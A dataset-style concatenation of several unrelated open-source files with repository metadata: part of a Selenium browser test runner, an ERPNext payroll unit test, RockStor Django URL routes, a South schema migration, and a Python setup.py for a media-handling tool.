"compares screenshots with reference images")
gflags.DEFINE_string(
"screenshotsdir",
selenium_constants.DEFAULT_SCREENSHOT_PATH,
"specifies the directory in which screenshots will be stored.")
gflags.DEFINE_string(
"referencedir",
selenium_constants.DEFAULT_SCREENSHOT_PATH,
"Specifies the directory where reference images will be read from.")
gflags.DEFINE_string(
"testprefix", "Test",
"specifies the prefix of tests to run")
gflags.DEFINE_string(
"testsuffixes",
"small,medium,large",
"specifies the suffixes, separated by commas of tests to run")
gflags.DEFINE_string(
"servertimeout",
"30",
"Specifies the timeout value, in seconds, for the selenium server.")
# Browsers to choose from (for browser flag).
# use --browser $BROWSER_NAME to run
# tests for that browser
gflags.DEFINE_list(
"browser",
"*firefox",
"\n".join(["comma-separated list of browsers to test",
"Options:"] +
selenium_constants.SELENIUM_BROWSER_SET))
gflags.DEFINE_string(
"browserpath",
"",
"specifies the path to the browser executable "
"(for platforms that don't support MOZ_PLUGIN_PATH)")
gflags.DEFINE_string(
"samplespath",
"",
"specifies the path from the web root to the samples.")
class MyRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
"""Hook to handle HTTP server requests.
Functions as a handler for logging and other utility functions.
"""
def log_message(self, format, *args):
"""Logging hook for HTTP server."""
# For now, just suppress logging.
pass
# TODO: might be nice to have a verbose option for debugging.
class LocalFileHTTPServer(threading.Thread):
"""Minimal HTTP server that serves local files.
Members:
http_alive: event to signal that http server is up and running
http_port: the TCP port the server is using
"""
START_PORT = 8100
END_PORT = 8105
def __init__(self, local_root=None):
"""Initializes the server.
Initializes the HTTP server to serve static files from the
local o3d directory
Args:
local_root: all files below this path are served. If not specified,
the current directory is the root.
"""
threading.Thread.__init__(self)
self._local_root = local_root
self.http_alive = threading.Event()
self.http_port = 0
def run(self):
"""Runs the HTTP server.
Server is started on an available port in the range of
START_PORT to END_PORT
"""
if self._local_root:
os.chdir(self._local_root)
for self.http_port in range(self.START_PORT, self.END_PORT):
# Attempt to start the server
try:
httpd = SocketServer.TCPServer(("", self.http_port),
MyRequestHandler)
except socket.error:
# Server didn't manage to start up, try another port.
pass
else:
self.http_alive.set()
httpd.serve_forever()
if not self.http_alive.isSet():
print("No available port found for HTTP server in the range %d to %d."
% (self.START_PORT, self.END_PORT))
self.http_port = 0
@staticmethod
def StartServer(local_root=None):
"""Create and start a LocalFileHTTPServer on a separate thread.
Args:
local_root: serve all static files below this directory. If not
specified, the current directory is the root.
Returns:
http_server: LocalFileHTTPServer() object
"""
# Start up the Selenium Remote Control server
http_server = LocalFileHTTPServer(local_root)
http_server.setDaemon(True)
http_server.start()
time_out = 30.0
# Wait till the Selenium RC Server is up
print 'Waiting %d seconds for local HTTP server to start.' % (int(time_out))
http_server.http_alive.wait(time_out)
if not http_server.http_port:
print 'Timed out.'
return None
print "LocalFileHTTPServer started on port %d" % http_server.http_port
return http_server
class SeleniumRemoteControl(threading.Thread):
"""A thread that launches the Selenium Remote Control server.
The Remote Control server allows us to launch a browser and remotely
control it from a script.
Members:
selenium_alive: event to signal that selenium server is up and running
selenium_port: the TCP port the server is using
process: the subprocess.Popen instance for the server
"""
START_PORT = 5430
END_PORT = 5535
def __init__(self, verbose, java_path, selenium_server, server_timeout):
"""Initializes the SeleniumRemoteControl class.
Args:
verbose: boolean verbose flag
java_path: path to java used to run selenium.
selenium_server: path to jar containing selenium server.
server_timeout: server timeout value, in seconds.
"""
self.selenium_alive = threading.Event()
self.selenium_port = 0
self.verbose = verbose
self.java_path = java_path
self.selenium_server = selenium_server
self.timeout = server_timeout
threading.Thread.__init__(self)
def run(self):
"""Starts the selenium server.
Server is started on an available port in the range of
START_PORT to END_PORT
"""
for self.selenium_port in range(self.START_PORT, self.END_PORT):
# Attempt to start the selenium RC server from java
self.process = subprocess.Popen(
[self.java_path, "-jar", self.selenium_server, "-multiWindow",
"-port", str(self.selenium_port), "-timeout", self.timeout],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
for unused_i in range(1, 10):
server_msg = self.process.stdout.readline()
if self.verbose and server_msg is not None:
# log if verbose flag is on
print "sel_serv:" + server_msg
# This status message indicates that the server has done
# a bind to the port self.selenium_port successfully.
if server_msg.find("INFO - Started SocketListener") != -1:
self.selenium_alive.set()
break
# Error starting server on this port, try the next port.
if not self.selenium_alive.isSet():
continue
# Loop and read from stdout
while self.process.poll() is None:
server_msg = self.process.stdout.readline()
if self.verbose and server_msg is not None:
# log if verbose flag is on
print "sel_serv:" + server_msg
# Finish.
break
if not self.selenium_alive.isSet():
print("No available port found for Selenium RC Server "
"in the range %d to %d."
% (self.START_PORT, self.END_PORT))
self.selenium_port = 0
@staticmethod
def StartServer(verbose, java_path, selenium_server, server_timeout):
"""Create and start the Selenium RC Server on a separate thread.
Args:
verbose: boolean verbose flag
java_path: path to java used to run selenium.
selenium_server: path to jar containing selenium server.
server_timeout: server timeout value, in seconds
Returns:
selenium_server: SeleniumRemoteControl() object
"""
# Start up the Selenium Remote Control server
selenium_server = SeleniumRemoteControl(verbose,
java_path,
selenium_server,
server_timeout)
selenium_server.setDaemon(True)
selenium_server.start()
time_out = 30.0
# Wait till the Selenium RC Server is up
print 'Waiting %d seconds for Selenium RC to start.' % (int(time_out))
selenium_server.selenium_alive.wait(time_out)
if not selenium_server.selenium_port:
print 'Timed out.'
return None
print("Selenium RC server started on port %d"
% selenium_server.selenium_port)
return selenium_server
class SeleniumSessionBuilder:
def __init__(self, sel_port, sel_timeout, http_port, browserpath):
self.sel_port = sel_port
self.sel_timeout = sel_timeout
self.http_port = http_port
self.browserpath = browserpath
def NewSeleniumSession(self, browser):
if browser == "*googlechrome":
# TODO: Replace socket.gethostname() with "localhost"
# once Chrome local proxy fix is in.
server_url = "http://" + socket.gethostname() + ":"
else:
server_url = "http://localhost:"
server_url += str(self.http_port)
browser_path_with_space = ""
if self.browserpath:
browser_path_with_space = " " + self.browserpath
new_session = selenium.selenium("localhost",
self.sel_port,
browser + browser_path_with_space,
server_url)
new_session.start()
new_session.set_timeout(self.sel_timeout)
if browser == "*iexplore":
# This improves stability on IE, especially IE 6. It at least fixes the
# StressWindow test. It adds a 10ms delay between selenium commands.
new_session.set_speed(10)
return new_session
def TestBrowser(session_builder, browser, test_list, verbose):
"""Runs Selenium tests for a specific browser.
Args:
session_builder: session_builder for creating new selenium sessions.
browser: selenium browser name (eg. *iexplore, *firefox).
test_list: list of tests.
Returns:
summary_result: result of test runners.
"""
print "Testing %s..." % browser
summary_result = test_runner.TestResult(test_runner.StringBuffer(), browser,
verbose)
# Fill up the selenium test queue.
test_queue = Queue.Queue()
for test in test_list:
test_queue.put(test)
pdiff_queue = None
if FLAGS.screenshots:
# Need to do screen comparisons.
# |pdiff_queue| is the queue of perceptual diff tests that need to be done.
# This queue is added to by individual slenium test runners.
# |pdiff_result_queue| is the result of the perceptual diff tests.
pdiff_queue = Queue.Queue()
pdiff_result_queue = Queue.Queue()
pdiff_worker = test_runner.PDiffTestRunner(pdiff_queue,
pdiff_result_queue,
browser, verbose)
pdiff_worker.start()
# Start initial selenium test runner.
worker = test_runner.SeleniumTestRunner(session_builder, browser,
test_queue, pdiff_queue,
verbose)
worker.start()
# Run through all selenium tests.
while not worker.IsCompletelyDone():
if worker.IsTesting() and worker.IsPastDeadline():
# Test has taken more than allotted. Abort and go to next test.
worker.AbortTest()
elif worker.DidFinishTest():
# Do this so that a worker does not grab test off queue till we tell it.
result = worker.Continue()
result.printAll(sys.stdout)
summary_result.merge(result)
# Sleep here for a brief time. This thread is polling the worker thread.
# We cannot wait for a message from the worker thread because the worker
# may hang on a bad test. We also do not want to sleep till the test's
# deadline because the test may finish before then.
time.sleep(.1)
if FLAGS.screenshots:
# Finish screenshot comparisons.
pdiff_worker.EndTesting()
while not pdiff_worker.IsCompletelyDone():
time.sleep(1)
# Be careful here, make sure no one else is editing |pdiff_reult_queue|.
while not pdiff_result_queue.empty():
result = pdiff_result_queue.get()
result.printAll(sys.stdout)
summary_result.merge(result)
return summary_result
def MatchesSuffix(name, suffixes):
"""Checks if a name ends in one of the suffixes.
Args:
name: Name to test.
suffixes: list of suffixes to test for.
Returns:
True if name ends in one of the suffixes or if suffixes is empty.
"""
if suffixes:
name_lower = name.lower()
for suffix in suffixes:
if name_lower.endswith(suffix):
return True
return False
else:
return True
def _GetTestsFromFile(filename, prefix, test_prefix_filter, test_suffixes,
browser, module, path_to_html):
"""Add tests defined in filename, and associated perceptual diff test, if
needed.
Assumes module has a method "GenericTest" that uses self.args to run.
Args:
filename: filename of file with list of tests.
prefix: prefix to add to the beginning of each test.
test_prefix_filter: Only adds a test if it starts with this.
test_suffixes: list of suffixes to filter by. An empty list = pass all.
browser: browser name.
module: module which will have method GenericTest() called to run each test.
path_to_html: Path from server root to html
"""
# See comments in that file for the expected format.
# skip lines that are blank or have "#" or ";" as their first non whitespace
# character.
test_list_file = open(filename, "r")
samples = test_list_file.readlines()
test_list_file.close()
tests = []
for sample in samples:
sample = sample.strip()
if not sample or sample[0] == ";" or sample[0] == "#":
continue
arguments = sample.split()
test_type = arguments[0].lower()
test_path = arguments[1]
options = arguments[2:]
# TODO: Add filter based on test_type
test_skipped = False
if test_path.startswith("Test"):
name = test_path
else:
# Need to make a name.
name = ("Test" + prefix + re.sub("\W", "_", test_path) +
test_type.capitalize())
# Only test suffixes for generic tests. That is how it has always worked.
if test_suffixes and not MatchesSuffix(name, test_suffixes):
test_skipped = True
if test_prefix_filter and not name.startswith(test_prefix_filter):
test_skipped = True
# Only execute this test if the current browser is not in the list
# of skipped browsers.
screenshot_count = 0
for option in options:
if option.startswith("except"):
skipped_platforms = selenium_utilities.GetArgument(option)
if not skipped_platforms is None:
skipped_platforms = skipped_platforms.split(",")
if browser in skipped_platforms:
test_skipped = True
elif option.startswith("screenshots"):
screenshot_count += int(selenium_utilities.GetArgument(option))
elif option.startswith("screenshot"):
screenshot_count += 1
if not test_skipped:
# Add a test method with this name if it doesn't exist.
if not (hasattr(module, name) and callable(getattr(module, name))):
setattr(module, name, module.GenericTest)
new_test = module(name, browser, path_to_html, test_type, test_path,
options)
if screenshot_count and FLAGS.screenshots:
pdiff_name = name + 'Screenshots'
screenshot = selenium_utilities.ScreenshotNameFromTestName(test_path)
setattr(pdiff_test.PDiffTest, pdiff_name,
pdiff_test.PDiffTest.PDiffTest)
new_pdiff = pdiff_test.PDiffTest(pdiff_name,
screenshot_count,
screenshot,
FLAGS.screencompare,
FLAGS.screenshotsdir,
FLAGS.referencedir,
options)
tests += [(new_test, new_pdiff)]
else:
tests += [new_test]
return tests
def GetTestsForBrowser(browser, test_prefix, test_suffixes):
"""Returns list of tests from test files.
Args:
browser: browser name
test_prefix: prefix of tests to run.
test_suffixes: A comma separated string of suffixes to filter by.
Returns:
A list of unittest.TestCase.
"""
tests = []
suffixes = test_suffixes.split(",")
# add sample tests.
filename = os.path.abspath(os.path.join(script_dir, "sample_list.txt"))
tests += _GetTestsFromFile(filename, "Sample", test_prefix, suffixes, browser,
samples_tests.SampleTests,
FLAGS.samplespath.replace("\\","/"))
# add javascript tests.
filename = os.path.abspath(os.path.join(script_dir,
"javascript_unit_test_list.txt"))
tests += _GetTestsFromFile(filename, "UnitTest", test_prefix, suffixes,
browser, javascript_unit_tests.JavaScriptUnitTests,
"")
return tests
def GetChromePath():
value = None
if sys.platform == "win32" or sys.platform == "cygwin":
import _winreg
try:
key = _winreg.OpenKey(_winreg.HKEY_CLASSES_ROOT,
"Applications\\chrome.exe\\shell\\open\\command")
(value, type) = _winreg.QueryValueEx(key, None)
_winreg.CloseKey(key)
value = os.path.dirname(value)
except WindowsError:
value = None
if '*googlechrome' in FLAGS.browser:
raise Exception("Unable to determine location for Chrome -- " +
"is it installed?")
return value
def main(unused_argv):
# Boolean to record if all tests passed.
all_tests_passed = True
selenium_constants.REFERENCE_SCREENSHOT_PATH = os.path.join(
FLAGS.referencedir,
"reference",
"")
selenium_constants.PLATFORM_SPECIFIC_REFERENCE_SCREENSHOT_PATH = os.path.join(
FLAGS.referencedir,
selenium_constants.PLATFORM_SCREENSHOT_DIR,
"")
# Launch HTTP server.
http_server = LocalFileHTTPServer.StartServer(FLAGS.product_dir)
if not http_server:
print "Could not start a local http server with root." % FLAGS.product_dir
return 1
# Start Selenium Remote Control and Selenium Session Builder.
sel_server_jar = os.path.abspath(FLAGS.selenium_server)
sel_server = SeleniumRemoteControl.StartServer(
FLAGS.verbose, FLAGS.java, sel_server_jar,
FLAGS.servertimeout)
if not sel_server:
print "Could not start selenium server at %s." % sel_server_jar
return 1
session_builder = SeleniumSessionBuilder(
sel_server.selenium_port,
int(FLAGS.servertimeout) * 1000,
http_server.http_port,
FLAGS.browserpath)
all_tests_passed = True
# Test browsers.
for browser in FLAGS.browser:
if browser in set(selenium_constants.SELENIUM_BROWSER_SET):
test_list = GetTestsForBrowser(browser, FLAGS.testprefix,
FLAGS.testsuffixes)
result = TestBrowser(session_builder, browser, test_list, FLAGS.verbose)
if not result.wasSuccessful():
all_tests_passed = False
# Log non-succesful tests, for convenience.
print ""
print "Failures for %s:" % browser
print "[Selenium tests]"
for entry in test_list:
if type(entry) == tuple:
test = entry[0]
else:
test = entry
if test in result.results:
if result.results[test] != 'PASS':
print test.name
print ""
print "[Perceptual Diff tests]"
for entry in test_list:
if type(entry) == tuple:
pdiff_test = entry[1]
if pdiff_test in result.results:
if result.results[pdiff_test] != 'PASS':
print pdiff_test.name
# Log summary results.
print ""
print "Summary for %s:" % browser
print " %d tests run." % result.testsRun
print " %d errors." % len(result.errors)
print " %d failures.\n" % len(result.failures)
else:
print "ERROR: Browser %s is invalid." % browser
print "Run with --help to view list of supported browsers.\n"
all_tests_passed = False
# Shut down remote control
shutdown_session = selenium.selenium("localhost",
sel_server.selenium_port, "*firefox",
"http://%s:%d" % (socket.gethostname(), http_server.http_port))
shutdown_session.shut_down_selenium_server()
if all_tests_passed:
# All tests successful.
return 0
else:
# Return error code 1.
return 1
if __name__ == "__main__":
remaining_argv = FLAGS(sys.argv)
# Setup the environment for Firefox
os.environ["MOZ_CRASHREPORTER_DISABLE"] = "1"
os.environ["MOZ_PLUGIN_PATH"] = os.path.normpath(FLAGS.product_dir)
# Setup the path for chrome.
chrome_path = GetChromePath()
if chrome_path:
if os.environ.get("PATH"):
os.environ["PATH"] = os.pathsep.join([os.environ["PATH"], chrome_path])
else:
os.environ["PATH"] = chrome_path
# Setup the LD_LIBRARY_PATH on Linux.
if sys.platform[:5] == "linux":
if os.environ.get("LD_LIBRARY_PATH"):
os.environ["LD_LIBRARY_PATH"] = os.pathsep.join(
[os.environ["LD_LIBRARY_PATH"], os.path.normpath(FLAGS.product_dir)])
else:
os.environ["LD_LIBRARY_PATH"] = os.path.normpath(FLAGS.product_dir)
sys.exit(main(remaining_argv))
| bsd-3-clause | -7,822,211,958,449,909,000 | 31.805073 | 83 | 0.651174 | false |
manassolanki/erpnext | erpnext/hr/doctype/payroll_entry/test_payroll_entry.py | 1 | 7091 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import unittest
import erpnext
import frappe
from dateutil.relativedelta import relativedelta
from erpnext.accounts.utils import get_fiscal_year, getdate, nowdate
from erpnext.hr.doctype.payroll_entry.payroll_entry import get_start_end_dates, get_end_date
class TestPayrollEntry(unittest.TestCase):
def test_payroll_entry(self): # pylint: disable=no-self-use
for data in frappe.get_all('Salary Component', fields = ["name"]):
if not frappe.db.get_value('Salary Component Account',
{'parent': data.name, 'company': erpnext.get_default_company()}, 'name'):
get_salary_component_account(data.name)
if not frappe.db.get_value("Salary Slip", {"start_date": "2016-11-01", "end_date": "2016-11-30"}):
make_payroll_entry()
def test_get_end_date(self):
self.assertEqual(get_end_date('2017-01-01', 'monthly'), {'end_date': '2017-01-31'})
self.assertEqual(get_end_date('2017-02-01', 'monthly'), {'end_date': '2017-02-28'})
self.assertEqual(get_end_date('2017-02-01', 'fortnightly'), {'end_date': '2017-02-14'})
self.assertEqual(get_end_date('2017-02-01', 'bimonthly'), {'end_date': ''})
self.assertEqual(get_end_date('2017-01-01', 'bimonthly'), {'end_date': ''})
self.assertEqual(get_end_date('2020-02-15', 'bimonthly'), {'end_date': ''})
self.assertEqual(get_end_date('2017-02-15', 'monthly'), {'end_date': '2017-03-14'})
self.assertEqual(get_end_date('2017-02-15', 'daily'), {'end_date': '2017-02-15'})
def test_loan(self):
from erpnext.hr.doctype.salary_structure.test_salary_structure import (make_employee,
make_salary_structure)
from erpnext.hr.doctype.loan.test_loan import create_loan
branch = "Test Employee Branch"
applicant = make_employee("[email protected]")
company = erpnext.get_default_company()
holiday_list = make_holiday("test holiday for loan")
if not frappe.db.exists('Salary Component', 'Basic Salary'):
frappe.get_doc({
'doctype': 'Salary Component',
'salary_component': 'Basic Salary',
'salary_component_abbr': 'BS',
'type': 'Earning',
'accounts': [{
'company': company,
'default_account': frappe.db.get_value('Account',
{'company': company, 'root_type': 'Expense', 'account_type': ''}, 'name')
}]
}).insert()
if not frappe.db.get_value('Salary Component Account',
{'parent': 'Basic Salary', 'company': company}):
salary_component = frappe.get_doc('Salary Component', 'Basic Salary')
salary_component.append('accounts', {
'company': company,
'default_account': "Salary - " + frappe.db.get_value('Company', company, 'abbr')
})
company_doc = frappe.get_doc('Company', company)
if not company_doc.default_payroll_payable_account:
company_doc.default_payroll_payable_account = frappe.db.get_value('Account',
{'company': company, 'root_type': 'Liability', 'account_type': ''}, 'name')
company_doc.save()
if not frappe.db.exists('Branch', branch):
frappe.get_doc({
'doctype': 'Branch',
'branch': branch
}).insert()
employee_doc = frappe.get_doc('Employee', applicant)
employee_doc.branch = branch
employee_doc.holiday_list = holiday_list
employee_doc.save()
loan = create_loan(applicant,
"Personal Loan", 280000, "Repay Over Number of Periods", 20)
loan.repay_from_salary = 1
loan.submit()
salary_strcture = "Test Salary Structure for Loan"
if not frappe.db.exists('Salary Structure', salary_strcture):
salary_strcture = make_salary_structure(salary_strcture, [{
'employee': applicant,
'from_date': '2017-01-01',
'base': 30000
}])
salary_strcture = frappe.get_doc('Salary Structure', salary_strcture)
salary_strcture.set('earnings', [{
'salary_component': 'Basic Salary',
'abbr': 'BS',
'amount_based_on_formula':1,
'formula': 'base*.5'
}])
salary_strcture.save()
dates = get_start_end_dates('Monthly', nowdate())
make_payroll_entry(start_date=dates.start_date,
end_date=dates.end_date, branch=branch)
name = frappe.db.get_value('Salary Slip',
{'posting_date': nowdate(), 'employee': applicant}, 'name')
salary_slip = frappe.get_doc('Salary Slip', name)
for row in salary_slip.loans:
if row.loan == loan.name:
interest_amount = (280000 * 8.4)/(12*100)
principal_amount = loan.monthly_repayment_amount - interest_amount
self.assertEqual(row.interest_amount, interest_amount)
self.assertEqual(row.principal_amount, principal_amount)
self.assertEqual(row.total_payment,
interest_amount + principal_amount)
if salary_slip.docstatus == 0:
frappe.delete_doc('Salary Slip', name)
loan.cancel()
frappe.delete_doc('Loan', loan.name)
def get_salary_component_account(sal_comp):
company = erpnext.get_default_company()
sal_comp = frappe.get_doc("Salary Component", sal_comp)
sc = sal_comp.append("accounts")
sc.company = company
sc.default_account = create_account(company)
def create_account(company):
salary_account = frappe.db.get_value("Account", "Salary - " + frappe.db.get_value('Company', company, 'abbr'))
if not salary_account:
frappe.get_doc({
"doctype": "Account",
"account_name": "Salary",
"parent_account": "Indirect Expenses - " + frappe.db.get_value('Company', company, 'abbr'),
"company": company
}).insert()
return salary_account
def make_payroll_entry(**args):
args = frappe._dict(args)
payroll_entry = frappe.new_doc("Payroll Entry")
payroll_entry.company = erpnext.get_default_company()
payroll_entry.start_date = args.start_date or "2016-11-01"
payroll_entry.end_date = args.end_date or "2016-11-30"
payroll_entry.payment_account = get_payment_account()
payroll_entry.posting_date = nowdate()
payroll_entry.payroll_frequency = "Monthly"
payroll_entry.branch = args.branch or None
payroll_entry.create_salary_slips()
payroll_entry.submit_salary_slips()
if payroll_entry.get_sal_slip_list(ss_status = 1):
payroll_entry.make_payment_entry()
return payroll_entry
def get_payment_account():
return frappe.get_value('Account',
{'account_type': 'Cash', 'company': erpnext.get_default_company(),'is_group':0}, "name")
def make_holiday(holiday_list_name):
if not frappe.db.exists('Holiday List', holiday_list_name):
current_fiscal_year = get_fiscal_year(nowdate(), as_dict=True)
dt = getdate(nowdate())
new_year = dt + relativedelta(month=1, day=1, year=dt.year)
republic_day = dt + relativedelta(month=1, day=26, year=dt.year)
test_holiday = dt + relativedelta(month=2, day=2, year=dt.year)
frappe.get_doc({
'doctype': 'Holiday List',
'from_date': current_fiscal_year.year_start_date,
'to_date': current_fiscal_year.year_end_date,
'holiday_list_name': holiday_list_name,
'holidays': [{
'holiday_date': new_year,
'description': 'New Year'
}, {
'holiday_date': republic_day,
'description': 'Republic Day'
}, {
'holiday_date': test_holiday,
'description': 'Test Holiday'
}]
}).insert()
return holiday_list_name
| gpl-3.0 | -6,668,528,203,621,711,000 | 36.125654 | 111 | 0.687491 | false |
priyaganti/rockstor-core | src/rockstor/storageadmin/urls/share.py | 1 | 2128 | """
Copyright (c) 2012-2013 RockStor, Inc. <http://rockstor.com>
This file is part of RockStor.
RockStor is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published
by the Free Software Foundation; either version 2 of the License,
or (at your option) any later version.
RockStor is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from django.conf.urls import patterns, url
from storageadmin.views import (ShareListView, ShareDetailView, ShareACLView,
SnapshotView, ShareCommandView,)
from django.conf import settings
share_regex = settings.SHARE_REGEX
snap_regex = share_regex
snap_command = 'clone'
share_command = 'rollback|clone'
urlpatterns = patterns(
'',
url(r'^$', ShareListView.as_view(), name='share-view'),
url(r'^/(?P<sname>%s)$' % share_regex, ShareDetailView.as_view(),
name='share-view'),
url(r'^/(?P<sname>%s)/(?P<command>force)$'
% share_regex, ShareDetailView.as_view(),),
# Individual snapshots don't have detailed representation in the web-ui. So
# thre is no need for SnapshotDetailView.
url(r'^/(?P<sname>%s)/snapshots$' % share_regex,
SnapshotView.as_view(), name='snapshot-view'),
url(r'^/(?P<sname>%s)/snapshots/(?P<snap_name>%s)$' % (share_regex,
snap_regex),
SnapshotView.as_view(), name='snapshot-view'),
url(r'^/(?P<sname>%s)/snapshots/(?P<snap_name>%s)/(?P<command>%s)$' %
(share_regex, snap_regex, snap_command), SnapshotView.as_view()),
url(r'^/(?P<sname>%s)/acl$' % share_regex, ShareACLView.as_view(),
name='acl-view'),
url(r'^/(?P<sname>%s)/(?P<command>%s)$' % (share_regex, share_command),
ShareCommandView.as_view()),
)
| gpl-3.0 | -8,414,302,478,397,085,000 | 39.150943 | 79 | 0.659774 | false |
globocom/database-as-a-service | dbaas/maintenance/migrations/0015_auto__add_maintenanceparameters.py | 1 | 5853 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'MaintenanceParameters'
db.create_table(u'maintenance_maintenanceparameters', (
(u'id', self.gf('django.db.models.fields.AutoField')
(primary_key=True)),
('created_at', self.gf('django.db.models.fields.DateTimeField')
(auto_now_add=True, blank=True)),
('updated_at', self.gf('django.db.models.fields.DateTimeField')
(auto_now=True, blank=True)),
('parameter_name', self.gf(
'django.db.models.fields.CharField')(max_length=100)),
('function_name', self.gf(
'django.db.models.fields.CharField')(max_length=100)),
('maintenance', self.gf('django.db.models.fields.related.ForeignKey')(
related_name=u'maintenance_params', to=orm['maintenance.Maintenance'])),
))
db.send_create_signal(u'maintenance', ['MaintenanceParameters'])
def backwards(self, orm):
# Deleting model 'MaintenanceParameters'
db.delete_table(u'maintenance_maintenanceparameters')
models = {
u'maintenance.hostmaintenance': {
'Meta': {'unique_together': "((u'host', u'maintenance'),)", 'object_name': 'HostMaintenance', 'index_together': "[[u'host', u'maintenance']]"},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'finished_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'host': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'host_maintenance'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['physical.Host']"}),
'hostname': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'main_log': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'maintenance': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'maintenance'", 'to': u"orm['maintenance.Maintenance']"}),
'rollback_log': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'started_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '4'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'maintenance.maintenance': {
'Meta': {'object_name': 'Maintenance'},
'affected_hosts': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'celery_task_id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'finished_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'hostsid': ('django.db.models.fields.CommaSeparatedIntegerField', [], {'max_length': '10000'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'main_script': ('django.db.models.fields.TextField', [], {}),
'maximum_workers': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '1'}),
'rollback_script': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'scheduled_for': ('django.db.models.fields.DateTimeField', [], {'unique': 'True'}),
'started_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'maintenance.maintenanceparameters': {
'Meta': {'object_name': 'MaintenanceParameters'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'function_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'maintenance': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'maintenance_params'", 'to': u"orm['maintenance.Maintenance']"}),
'parameter_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'physical.host': {
'Meta': {'object_name': 'Host'},
'address': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'hostname': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'monitor_url': ('django.db.models.fields.URLField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
}
}
complete_apps = ['maintenance']
| bsd-3-clause | -3,582,005,703,774,428,700 | 68.678571 | 191 | 0.572185 | false |
ErinMorelli/em-media-handler | setup.py | 1 | 2691 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# EM MEDIA HANDLER
# Copyright (c) 2014-2021 Erin Morelli
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Media handler module setup
"""
import os
from setuptools import setup
from mediahandler.util.config import make_config
# Set up extra scripts
_extra_scripts = []
if os.name == 'nt':
_extra_scripts.append('addmedia-deluge.bat')
# Set up mediahandler package
setup(
name='em-media-handler',
version='1.2',
author='Erin Morelli',
author_email='[email protected]',
url='http://www.erinmorelli.com/projects/em-media-handler/',
license='MIT',
platforms='Linux, OSX, Windows',
description='A comprehensive media handling automation script.',
long_description=open('README.md').read(),
test_suite='tests.testall.suite',
include_package_data=True,
packages=[
'mediahandler',
'mediahandler.types',
'mediahandler.util',
],
entry_points={
'console_scripts': [
'addmedia=mediahandler.handler:main',
'addmedia-deluge=mediahandler.handler:deluge'
]
},
scripts=_extra_scripts,
install_requires=[
'pyyaml',
'google-api-python-client',
'mutagen',
'oauth2client<=3.0.0',
'setuptools>=40.3.0',
'requests'
],
extras_require={
'music': [
'beets',
'pylast==2.3.0'
],
'deluge': [
'twisted',
'pyopenssl'
],
},
tests_require=[
'unittest2',
'responses',
'mock'
],
classifiers=[
'Topic :: Home Automation',
'Topic :: Multimedia',
'Topic :: Software Development :: Libraries :: Python Modules',
'License :: OSI Approved :: MIT License',
'Environment :: MacOS X',
'Environment :: Console',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Operating System :: MacOS',
'Operating System :: POSIX :: Linux',
],
)
# Generate default config file
make_config()
| mit | -3,059,469,731,831,596,000 | 26.181818 | 71 | 0.614641 | false |
